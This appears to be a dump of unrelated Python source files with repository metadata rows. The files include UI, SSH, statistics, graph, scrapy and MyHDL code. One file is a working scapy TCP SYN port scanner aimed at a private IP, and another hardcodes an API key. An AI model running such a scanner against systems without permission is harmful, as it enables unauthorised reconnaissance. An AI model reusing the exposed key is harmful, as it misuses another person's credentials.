    def show_big_popup(self, widget):
        self._width_ratio = 90
        self._height_ratio = 80

        def factory_method():
            dialog = urwid.AttrMap(urwid.LineBox(widget, title=widget.name), 'linebox')
            urwid.connect_signal(widget, widget.SIGNAL_ESCAPE, self.close_pop_up)
            urwid.connect_signal(widget, widget.SIGNAL_QUIT,
                                 self.close_pop_up_then(self.show_quit_dialog))
            return dialog

        self._popup_factory_method = factory_method
        result = self.open_pop_up()
        shared_main_loop.refresh()
        return result

    def show_table_changer(self, widget):
        self._width_ratio = 25
        self._height_ratio = 70

        def factory_method():
            dialog = urwid.AttrMap(urwid.LineBox(widget, title=u'Change table'), 'linebox')
            urwid.connect_signal(widget, widget.SIGNAL_ESCAPE, self.close_pop_up)
            return dialog

        self._popup_factory_method = factory_method
        result = self.open_pop_up()
        shared_main_loop.refresh()
        return result

    def _reset_popup_size_ratio(self):
        self._width_ratio = self.DEFAULT_WR
        self._height_ratio = self.DEFAULT_HR

    def render(self, size, focus=False):
        self._max_width, self._max_height = size
        return super().render(size, focus)
| 34.113208 | 91 | 0.6309 | 658 | 5,424 | 4.869301 | 0.18693 | 0.093321 | 0.034332 | 0.061798 | 0.5902 | 0.526217 | 0.456305 | 0.456305 | 0.456305 | 0.427591 | 0 | 0.007176 | 0.280605 | 5,424 | 158 | 92 | 34.329114 | 0.813942 | 0.030236 | 0 | 0.459677 | 0 | 0 | 0.028566 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.201613 | false | 0 | 0.040323 | 0.008065 | 0.419355 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca2e5ef930ba43da3724f81c6111b142413377f8 | 266 | py | Python | Desafios/Desafio110.py | vaniaferreira/Python | 5b3158836d47c0bb7bc446e6636e7b3dcea8a0ab | [
"MIT"
] | null | null | null | Desafios/Desafio110.py | vaniaferreira/Python | 5b3158836d47c0bb7bc446e6636e7b3dcea8a0ab | [
"MIT"
] | null | null | null | Desafios/Desafio110.py | vaniaferreira/Python | 5b3158836d47c0bb7bc446e6636e7b3dcea8a0ab | [
"MIT"
] | null | null | null | #Adicione ao módulo moeda.py criado nos desafios anteriores, uma função chamada resumo(), que mostre na tela algumas
#informaçôes geradas pelas funções que já temos no módulo criado até aqui.
import moeda
p = float(input('Preço: R$'))
moeda.resumo(p, 20, 12)
| 20.461538 | 116 | 0.74812 | 42 | 266 | 4.738095 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0181 | 0.169173 | 266 | 12 | 117 | 22.166667 | 0.882353 | 0.706767 | 0 | 0 | 0 | 0 | 0.126761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
ca32957679bae1dd771e128856697fc064b21819 | 1,066 | py | Python | devices/ssh_connection.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | 74 | 2015-08-25T22:50:38.000Z | 2022-01-04T16:32:00.000Z | devices/ssh_connection.py | premandfriends/boardfarm-1 | 3c952c94507fff25ba9955cad993610ea4a95e2e | [
"BSD-3-Clause-Clear"
] | 72 | 2015-10-12T17:42:47.000Z | 2019-01-19T14:11:18.000Z | devices/ssh_connection.py | mgualco-contractor/boardfarm | 6a033e5dc84c7368fdd8ec2738b08b35ca7b07e7 | [
"BSD-3-Clause-Clear"
] | 50 | 2015-08-25T22:45:44.000Z | 2022-01-05T09:47:04.000Z | import pexpect
class SshConnection:
    '''
    To use, set conn_cmd in your json to "ssh root@192.168.1.1 -i ~/.ssh/id_rsa"
    and set connection_type to "ssh"
    '''
    def __init__(self, device=None, conn_cmd=None, ssh_password='None', **kwargs):
        self.device = device
        self.conn_cmd = conn_cmd
        self.ssh_password = ssh_password

    def connect(self):
        pexpect.spawn.__init__(self.device,
                               command='/bin/bash',
                               args=['-c', self.conn_cmd])
        try:
            result = self.device.expect(["assword:", "passphrase"] + self.device.prompt)
        except pexpect.EOF as e:
            raise Exception("Board is in use (connection refused).")
        if result == 0 or result == 1:
            assert self.ssh_password is not None, "Please add ssh_password in your json configuration file."
            self.device.sendline(self.ssh_password)
            self.device.expect(self.device.prompt)

    def close(self):
        self.device.sendline('exit')
ca3bd3a376645b025849e3f06f5829483ac7b31b | 222 | py | Python | 10 days of statistics/Day5PoissonDistribution2.py | rahamath2009/git-github.com-nishant-sethi-HackerRank | 14d9bd3e772a863aceba22d9a3361a8325cca4bc | [
"Apache-2.0"
] | 76 | 2018-06-28T04:29:14.000Z | 2022-03-21T01:57:27.000Z | 10 days of statistics/Day5PoissonDistribution2.py | rahamath2009/git-github.com-nishant-sethi-HackerRank | 14d9bd3e772a863aceba22d9a3361a8325cca4bc | [
"Apache-2.0"
] | 31 | 2018-10-01T09:12:05.000Z | 2022-03-08T23:39:01.000Z | 10 days of statistics/Day5PoissonDistribution2.py | rahamath2009/git-github.com-nishant-sethi-HackerRank | 14d9bd3e772a863aceba22d9a3361a8325cca4bc | [
"Apache-2.0"
] | 44 | 2018-07-09T11:31:20.000Z | 2022-01-12T19:21:20.000Z | '''
Created on May 28, 2018
@author: nishant.sethi
'''
import math
mean_x=0.88
mean_y=1.55
result_x=160+40*(mean_x+mean_x**2)
result_y=128+40*(mean_y+mean_y**2)
print(round(result_x,3))
print(round(result_y,3)) | 18.5 | 35 | 0.693694 | 46 | 222 | 3.130435 | 0.543478 | 0.104167 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134021 | 0.126126 | 222 | 12 | 36 | 18.5 | 0.608247 | 0.211712 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.142857 | 0.285714 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca44efe3a14324ad455173735e360004c5e5aad2 | 2,136 | py | Python | PortScan/portScan.py | Pter18/PruebasPentest | 4775a686fe1b82a4227b16a91e1f11de6a38ba3c | [
"MIT"
] | null | null | null | PortScan/portScan.py | Pter18/PruebasPentest | 4775a686fe1b82a4227b16a91e1f11de6a38ba3c | [
"MIT"
] | null | null | null | PortScan/portScan.py | Pter18/PruebasPentest | 4775a686fe1b82a4227b16a91e1f11de6a38ba3c | [
"MIT"
] | null | null | null | #|/bin/python
'''
Rodriguez Gallardo Pedro Alejandro
Plan de Becarios generacion 13
Curso: Pruebas de penetracion
Programa que escanea una IP y detenrmina los puertos
abiertos con ayuda de scapy.
'''
import time
from scapy.all import *
# IP a escanear
ip = "192.168.2.70"
# Cuenta de puertos cerrados
closed_ports = 0
# Arreglo donde almacenaremos los puertos abiertos que encontremos.
open_ports = []
# Funcion que no ayuda a determinar si el equipo con la IP solicitada esta encendida
def is_up(ip):
# Realizamos un PING
icmp = IP(dst=ip)/ICMP()
resp = sr1(icmp, timeout=10)
if resp == None:
return False
else:
return True
if __name__ == '__main__':
# Deshabilitamos el modo verbose en sr(), sr1()
conf.verb = 0
# Rango de puertos a escanear 1 - 1024
ports = range(1, 1024)
if is_up(ip):
print "Host %s esta encendido." % ip
print "Iniciando escaneo..."
for port in ports:
# Establecemos un puerto aleatorio de origen por cada puerto a consultar, para evitar ser bloqueados.
src_port = RandShort()
# Creamos un request tipo TCP - SYN
p_tcp = IP(dst=ip)/TCP(sport=src_port, dport=port, flags='S')
# Envio request
resp = sr1(p_tcp, timeout=2)
if str(type(resp)) == "<type 'NoneType'>":
closed_ports += 1 # aumentamos la cuenta
elif resp.haslayer(TCP):
# 0x12 = SYN/ACK Puerto Abierto
if resp.getlayer(TCP).flags == 0x12:
send_rst = sr(IP(dst=ip)/TCP(sport=src_port, dport=port, flags='AR'), timeout=1)
open_ports.append(port) # Agregamos a la lista
# 0x14 = SYN/RST Puerto Cerrado
elif resp.getlayer(TCP).flags == 0x14:
closed_ports += 1 # aumentamos la cuenta
if len(open_ports) != 0:
for o_port in open_ports:
print "%d open" % o_port
print "%d puertos cerrados de %d puertos escaneados" % (closed_ports, len(ports))
else:
print "Host %s esta apagado." % ip
| 35.016393 | 113 | 0.603933 | 289 | 2,136 | 4.373702 | 0.49481 | 0.03481 | 0.016614 | 0.022152 | 0.10443 | 0.10443 | 0.056962 | 0.056962 | 0.056962 | 0.056962 | 0 | 0.030181 | 0.301966 | 2,136 | 60 | 114 | 35.6 | 0.817572 | 0.269195 | 0 | 0.111111 | 0 | 0 | 0.114054 | 0 | 0 | 0 | 0.005887 | 0 | 0 | 0 | null | null | 0 | 0.055556 | null | null | 0.138889 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
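The magic flag values tested above (0x12, 0x14) are just bitmasks over the TCP flag bits defined in RFC 793; a small, scapy-independent sketch decoding them:

```python
# TCP flag bits per RFC 793
FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04,
         "PSH": 0x08, "ACK": 0x10, "URG": 0x20}

def flag_names(value):
    """Names of the flag bits set in a TCP flags byte."""
    return sorted(name for name, bit in FLAGS.items() if value & bit)

print(flag_names(0x12))  # → ['ACK', 'SYN']  (SYN/ACK: port open in a SYN scan)
print(flag_names(0x14))  # → ['ACK', 'RST']  (RST/ACK: port closed)
```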
ca495ff6d99e320548bea5450f91415d2d462394 | 836 | py | Python | pygfa/operations.py | Francesco2304/pygfa | 9bf6fb5f0a959685300ab863a0e716a2268109f7 | [
"MIT"
] | 3 | 2020-06-25T22:47:02.000Z | 2022-02-27T15:16:02.000Z | pygfa/operations.py | Francesco2304/pygfa | 9bf6fb5f0a959685300ab863a0e716a2268109f7 | [
"MIT"
] | 3 | 2017-08-08T12:24:23.000Z | 2022-02-27T15:17:25.000Z | pygfa/operations.py | Francesco2304/pygfa | 9bf6fb5f0a959685300ab863a0e716a2268109f7 | [
"MIT"
] | 4 | 2019-02-04T20:54:53.000Z | 2020-05-14T19:52:24.000Z | from networkx.algorithms.components.connected import node_connected_component as nx_node_connected_component
from networkx.algorithms.components.connected import connected_components as nx_connected_components
import pygfa.gfa # required for GFAError (gives error otherwise)
def nodes_connected_component(gfa_, nid):
"""Return the connected component
belonging to the given node.
:param nid: The id of the node to find the reachable nodes.
"""
if nid not in gfa_:
raise pygfa.gfa.GFAError("The source node is not in the graph.")
    return nx_node_connected_component(gfa_._graph, nid)
def nodes_connected_components(gfa_):
"""Return a generator of sets with nodes of each weakly
connected component in the graph.
"""
return nx_connected_components(gfa_._graph)
| 38 | 108 | 0.748804 | 113 | 836 | 5.327434 | 0.389381 | 0.179402 | 0.109635 | 0.106312 | 0.215947 | 0.156146 | 0 | 0 | 0 | 0 | 0 | 0 | 0.191388 | 836 | 21 | 109 | 39.809524 | 0.890533 | 0.303828 | 0 | 0 | 0 | 0 | 0.065574 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.3 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
ca4e61922979fa286da153af698ea6dab0729124 | 266 | py | Python | server/opendp_apps/model_helpers/msg_util.py | mikephelan/opendp-ux | 80c65da0ed17adc01c69b05dbc9cbf3a5973a016 | [
"MIT"
] | 6 | 2021-05-25T18:50:58.000Z | 2022-03-23T19:52:15.000Z | server/opendp_apps/model_helpers/msg_util.py | mikephelan/opendp-ux | 80c65da0ed17adc01c69b05dbc9cbf3a5973a016 | [
"MIT"
] | 298 | 2021-05-19T17:34:09.000Z | 2022-03-29T18:45:22.000Z | server/opendp_apps/model_helpers/msg_util.py | opendp/dpcreator | 6ba3c58ecdcd81ca1f4533a14ce7604eccf6a646 | [
"MIT"
] | 2 | 2020-10-16T22:03:24.000Z | 2020-11-15T22:45:19.000Z | def msg(m):
"""
Shorthand for print statement
"""
print(m)
def dashes(cnt=40):
"""
Print dashed line
"""
msg('-' * cnt)
def msgt(m):
"""
    Add dashed line pre/post print statement
"""
dashes()
msg(m)
dashes()
| 12.090909 | 43 | 0.492481 | 32 | 266 | 4.09375 | 0.53125 | 0.061069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011494 | 0.345865 | 266 | 21 | 44 | 12.666667 | 0.741379 | 0.327068 | 0 | 0.25 | 0 | 0 | 0.007519 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0 | 0 | 0 | 0.375 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca56829f893d1be24d8f759f0e5d686d90b4ce8d | 1,467 | py | Python | scrapy/selector/lxmlsel.py | hobson/scrapy | 9f2465fb81628f2bb70d8d03fd23aa41e9801eae | [
"BSD-3-Clause"
] | null | null | null | scrapy/selector/lxmlsel.py | hobson/scrapy | 9f2465fb81628f2bb70d8d03fd23aa41e9801eae | [
"BSD-3-Clause"
] | null | null | null | scrapy/selector/lxmlsel.py | hobson/scrapy | 9f2465fb81628f2bb70d8d03fd23aa41e9801eae | [
"BSD-3-Clause"
] | null | null | null | """
XPath selectors based on lxml
"""
from .unified import Selector, SelectorList
__all__ = ['HtmlXPathSelector', 'XmlXPathSelector', 'XPathSelector',
'XPathSelectorList']
class XPathSelector(Selector):
__slots__ = ()
_default_type = 'html'
def __init__(self, *a, **kw):
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
warnings.warn('%s is deprecated, instantiate scrapy.selector.Selector '
'instead' % type(self).__name__,
category=ScrapyDeprecationWarning, stacklevel=1)
super(XPathSelector, self).__init__(*a, **kw)
def css(self, *a, **kw):
raise RuntimeError('.css() method not available for %s, '
'instantiate scrapy.selector.Selector '
'instead' % type(self).__name__)
class XmlXPathSelector(XPathSelector):
__slots__ = ()
_default_type = 'xml'
class HtmlXPathSelector(XPathSelector):
__slots__ = ()
_default_type = 'html'
class XPathSelectorList(SelectorList):
def __init__(self, *a, **kw):
import warnings
from scrapy.exceptions import ScrapyDeprecationWarning
warnings.warn('XPathSelectorList is deprecated, instantiate '
'scrapy.selector.SelectorList instead',
category=ScrapyDeprecationWarning, stacklevel=1)
super(XPathSelectorList, self).__init__(*a, **kw)
| 30.5625 | 79 | 0.637355 | 127 | 1,467 | 7 | 0.377953 | 0.016873 | 0.053993 | 0.044994 | 0.482565 | 0.31946 | 0.31946 | 0.31946 | 0.202475 | 0.202475 | 0 | 0.001843 | 0.260395 | 1,467 | 47 | 80 | 31.212766 | 0.817512 | 0.019768 | 0 | 0.419355 | 0 | 0 | 0.207692 | 0.053147 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0 | 0.16129 | 0 | 0.580645 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
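The pattern in `lxmlsel.py` — keep the old class name as a thin subclass that warns on instantiation, then delegates to the new implementation — can be sketched generically with the stdlib `warnings` module (the class names here are hypothetical):

```python
import warnings

class NewAPI:
    def __init__(self, value):
        self.value = value

class OldAPI(NewAPI):
    """Deprecated alias kept for backward compatibility."""
    def __init__(self, *a, **kw):
        warnings.warn(
            '%s is deprecated, instantiate NewAPI instead' % type(self).__name__,
            category=DeprecationWarning, stacklevel=2)
        super().__init__(*a, **kw)

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    obj = OldAPI(42)

print(obj.value, caught[0].category.__name__)  # → 42 DeprecationWarning
```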
ca605c6ef1b2ca158ae12b5e670631d41c835b07 | 302 | py | Python | src/myResume.py | charlielin99/Jobalytics | cf0461eb3862e375032cfe2ef05eadf7bf465fec | [
"MIT"
] | 13 | 2018-08-19T14:10:32.000Z | 2021-10-01T20:20:38.000Z | src/myResume.py | charlielin99/Jobalytics | cf0461eb3862e375032cfe2ef05eadf7bf465fec | [
"MIT"
] | 1 | 2021-04-06T04:58:43.000Z | 2021-04-06T04:58:43.000Z | src/myResume.py | charlielin99/Jobalytics | cf0461eb3862e375032cfe2ef05eadf7bf465fec | [
"MIT"
] | 4 | 2018-09-20T19:43:29.000Z | 2020-01-23T10:33:16.000Z | import indicoio, os, json
indicoio.config.api_key = '27df1eee04c5b65fb3113e9458d1d701'
fileDir = os.path.dirname(os.path.realpath('__file__'))
fileResumeTxt = open(os.path.join(fileDir, "data/resume.txt"), 'w')
resume = "data/resumePDF.pdf"
print(json.dumps(indicoio.pdf_extraction(resume))) | 33.555556 | 68 | 0.751656 | 38 | 302 | 5.815789 | 0.657895 | 0.081448 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07326 | 0.096026 | 302 | 9 | 69 | 33.555556 | 0.736264 | 0 | 0 | 0 | 0 | 0 | 0.250847 | 0.108475 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0.166667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca6901950982a690817b33bf00b4352b3b47bec5 | 10,056 | py | Python | test/unit/parser/test_parser_helper.py | buddly27/champollion | aa53804ad11e32f1bb8dcb02668c6df3771efcaa | [
"Apache-2.0"
] | 3 | 2017-06-13T01:36:32.000Z | 2020-12-14T18:26:01.000Z | test/unit/parser/test_parser_helper.py | buddly27/champollion | aa53804ad11e32f1bb8dcb02668c6df3771efcaa | [
"Apache-2.0"
] | 1 | 2018-09-27T16:13:48.000Z | 2020-06-03T22:27:56.000Z | test/unit/parser/test_parser_helper.py | buddly27/champollion | aa53804ad11e32f1bb8dcb02668c6df3771efcaa | [
"Apache-2.0"
] | null | null | null | # :coding: utf-8
import pytest
import os
import champollion.parser.helper
@pytest.mark.parametrize(
("content_lines", "line_number", "expected"),
[
(
[
"/**",
" * An function example.",
" *",
" * Detailed description.",
" *",
" * .. note::",
" *",
" * A note.",
" */",
"function sum(a, b) {",
" return a+b;",
"}",
],
10,
(
"An function example.\n"
"\n"
"Detailed description.\n"
"\n"
".. note::\n"
"\n"
" A note."
)
),
(
[
"/** A cool data. */",
"const Data = null",
],
2,
(
"A cool data."
)
),
(
[
"/*",
" * Incorrect docstring",
" */",
"function doSomething() {",
" console.log('something');",
"}",
],
4,
None
),
(
[
"/*",
"",
" Incorrect docstring",
"",
"*/",
"function doSomethingElse() {",
" console.log('something_else');",
"}",
],
6,
None
),
(
[
"// Incorrect docstring",
"function doSomethingElse() {",
" console.log('something_else');",
"}",
],
2,
None
),
(
[
"",
"function doSomethingElse() {",
" console.log('something_else');",
"}",
],
2,
None
),
(
[
"/** A cool data. */",
"const Data = null",
],
1,
None
)
],
ids=[
"valid element line number with multiline docstring",
"valid element line number with one line docstring",
"valid element line number with incorrect docstring 1",
"valid element line number with incorrect docstring 2",
"valid element line number with incorrect docstring 3",
"valid element line number with no docstring",
"invalid line_number",
]
)
def test_get_docstrings(content_lines, line_number, expected):
"""Return docstrings from a element's line number."""
assert champollion.parser.helper.get_docstring(
line_number, content_lines
) == expected
def test_filter_comments():
"""Remove all comments from content"""
content = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"// a data docstring\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" // Return the sum of a and b\n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
expected = (
"'use strict'; \n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"const DATA = 1;\n"
"\n"
"\n"
"\n"
"\n"
"function sum(a, b) {\n"
" \n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
assert champollion.parser.helper.filter_comments(content) == expected
def test_filter_comments_keep_content_size():
"""Remove all comments from content while keeping content size."""
content = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"// a data docstring\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" // Return the sum of a and b\n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
expected = (
"'use strict'; {comment1}\n"
"\n"
"{comment2}\n"
"\n"
"\n"
"\n"
"\n"
"{comment3}\n"
"const DATA = 1;\n"
"\n"
"{comment4}\n"
"\n"
"\n"
"function sum(a, b) {{\n"
" {comment5}\n"
" return a+b;\n"
"}}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
).format(
comment1=" " * len("/* a beautiful comment */"),
comment2=" " * len(
"/*"
"a long comment that can take a lot of places so"
"we put it on several lines."
"*/"
),
comment3=" " * len("// a data docstring"),
comment4=" " * len(
"/**"
" * Function docstring"
" */"
),
comment5=" " * len("// Return the sum of a and b")
)
assert champollion.parser.helper.filter_comments(
content, keep_content_size=True
) == expected
def test_filter_comments_without_multiline_comments():
"""Remove all comments from content without multiline comments."""
content = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"// a data docstring\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" // Return the sum of a and b\n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
expected = (
"'use strict'; /* a beautiful comment */\n"
"\n"
"/*\n"
"a long comment that can take a lot of places so\n"
"we put it on several lines.\n"
"*/\n"
"\n"
"\n"
"const DATA = 1;\n"
"\n"
"/**\n"
" * Function docstring\n"
" */\n"
"function sum(a, b) {\n"
" \n"
" return a+b;\n"
"}\n"
"\n"
"const url = 'http://somewhere.com';\n"
"\n"
)
assert champollion.parser.helper.filter_comments(
content, filter_multiline_comment=False
) == expected
@pytest.mark.parametrize(
("content", "expected_content", "expected_collapsed_content"),
[
(
"const emptyObject = {};",
"const emptyObject = {};",
{}
),
(
"let test = {a: 1, b: 2, c: 3};",
"let test = {};",
{
1: "{a: 1, b: 2, c: 3}"
}
),
(
(
"const element = {\n"
" key1: value1,\n"
" key2: value2,\n"
" key3: value3,\n"
"};\n"
"\n"
"function sum(a, b) {\n"
" return a+b\n"
"}\n"
"\n"
),
(
"const element = {}\n"
"\n"
"\n"
"\n"
";\n"
"\n"
"function sum(a, b) {}\n"
"\n"
"\n"
"\n"
),
{
1: (
"{\n"
" key1: value1,\n"
" key2: value2,\n"
" key3: value3,\n"
"}"
),
7: "{\n"
" return a+b\n"
"}"
}
),
(
(
"class AwesomeClass {\n"
" constructor() {\n"
" this.data = 1;\n"
" }\n"
"\n"
" increase() {\n"
" this.data += 1;\n"
" }\n"
"}\n"
),
(
"class AwesomeClass {}\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
"\n"
),
{
1: (
"{\n"
" constructor() {\n"
" this.data = 1;\n"
" }\n"
"\n"
" increase() {\n"
" this.data += 1;\n"
" }\n"
"}"
),
2: (
"{\n"
" this.data = 1;\n"
" }"
),
6: (
"{\n"
" this.data += 1;\n"
" }"
)
}
)
],
ids=[
"empty object",
"simple object",
"objects and functions on multiple lines",
"nested class"
]
)
def test_collapse_all(content, expected_content, expected_collapsed_content):
"""Collapse all objects, classes and functions."""
assert champollion.parser.helper.collapse_all(content) == (
expected_content, expected_collapsed_content
)
| 24.952854 | 77 | 0.3393 | 836 | 10,056 | 4.028708 | 0.151914 | 0.058195 | 0.044537 | 0.023753 | 0.704572 | 0.628563 | 0.552257 | 0.49228 | 0.428741 | 0.383017 | 0 | 0.011866 | 0.513922 | 10,056 | 402 | 78 | 25.014925 | 0.677169 | 0.026154 | 0 | 0.657895 | 0 | 0 | 0.36265 | 0.014436 | 0 | 0 | 0 | 0 | 0.013158 | 1 | 0.013158 | false | 0 | 0.007895 | 0 | 0.021053 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
ca6e2b256c330324a67fb4aa6dd0d2a9b8cc825c | 9,706 | py | Python | MyHDLSim/Manager.py | mattsnowboard/msu-myhdlsim | 5d0d881b682a72b77d9597cb84b8fdd4bd444afc | [
"BSD-2-Clause"
] | 1 | 2021-03-30T10:20:06.000Z | 2021-03-30T10:20:06.000Z | MyHDLSim/Manager.py | mattsnowboard/msu-myhdlsim | 5d0d881b682a72b77d9597cb84b8fdd4bd444afc | [
"BSD-2-Clause"
] | null | null | null | MyHDLSim/Manager.py | mattsnowboard/msu-myhdlsim | 5d0d881b682a72b77d9597cb84b8fdd4bd444afc | [
"BSD-2-Clause"
] | null | null | null | import wx
import wx.lib.ogl as ogl
from myhdl import Signal, Simulation, delay, instance, StopSimulation, now
from MyHDLSim.Wrappers.SignalWrapper import SignalWrapper
from MyHDLSim.Module import Module
from MyHDLSim.wxApplication import MainWindow, ThreadTimer, EVT_THREAD_TIMER
class Manager:
""" This class will manage the Signals and Gates and Simulator """
def __init__(self, app):
""" Given an application, create the window and canvas
Creates a top level module
Binds some events
"""
self._frame = MainWindow(None, 'Demo')
self._canvas = self._frame.GetCanvas()
self._canvas.SetManager(self)
self._app = app
# top level module
self._top = Module(self, self._canvas)
# get passed to MyHDL simulator (gates, event listening generators, etc.)
self._instances = list()
# quick look up of gates/signals by ID
self._modules = []
self._gates = []
self._signals = []
self._signalMap = {}
self._moduleMap = {}
# this is to help with showing/hiding modules
self._moduleHierarchy = []
self._displayDepth = 0
self._canvas.Bind(wx.EVT_CHAR, self.OnKey)
# Set timing events
self._pause = False
self._frame._OnPauseClick(None)
self._timer = ThreadTimer(self._frame)
self._timer.start(250)
self._frame.Bind(EVT_THREAD_TIMER, self.OnTimer)
self._canvas.SetFocus()
def CreateSignal(self, initial = None, width = 1):
""" Create a signal which we can keep track of
This needs to be done before adding switches or probes
initial: initial value of the signal (or undefined)
width: How many bits in this signal
"""
signal = SignalWrapper(self._canvas, initial, width)
self._signals.append(signal)
return signal
def CreateModule(self):
""" Create a module that a user can define
return: the module ready to be customized
"""
module = Module(self, self._canvas)
self._modules.append(module)
return module
def AddSwitch(self, pos, signal, key):
""" Add a switch to an existing signal
"""
# @todo verify we have created the signal, else it won't update
signal.SetSwitch(self._canvas, key)
signal.SetX(pos[0])
signal.SetY(pos[1])
self._signalMap[ord(key)] = signal
self._canvas.AddMyHDLSignal(signal.GetShape(), pos[0], pos[1])
def AddProbe(self, pos, a, label):
""" Add a signal visually with a label but no key events
"""
# @todo verify we have created the signal, else it won't update
signal = self.CreateSignal()
signal.SetProbe(self._canvas, a, label)
signal.SetX(pos[0])
signal.SetY(pos[1])
self._canvas.AddMyHDLSignal(signal.GetShape(), pos[0], pos[1])
def AddClock(self, pos, signal, label, period = 20):
""" Add a switch to an existing signal
"""
# @todo verify we have created the signal, else it won't update
signal.SetClockDriver(self._canvas, label, period)
signal.SetX(pos[0])
signal.SetY(pos[1])
self._canvas.AddMyHDLSignal(signal.GetShape(), pos[0], pos[1], False)
self._top._addInstance(signal)
def AddAndGate(self, pos, out, a, b, c = None, d = None):
""" Create an AND gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddAndGate(pos, out, a, b, c, d)
def AddNandGate(self, pos, out, a, b, c = None, d = None):
""" Create a NAND gate
This is a way to allow users to ignore the underlying module
"""
self._top.AddNandGate(pos, out, a, b, c, d)
def AddOrGate(self, pos, out, a, b, c = None, d = None):
""" Create an OR gate
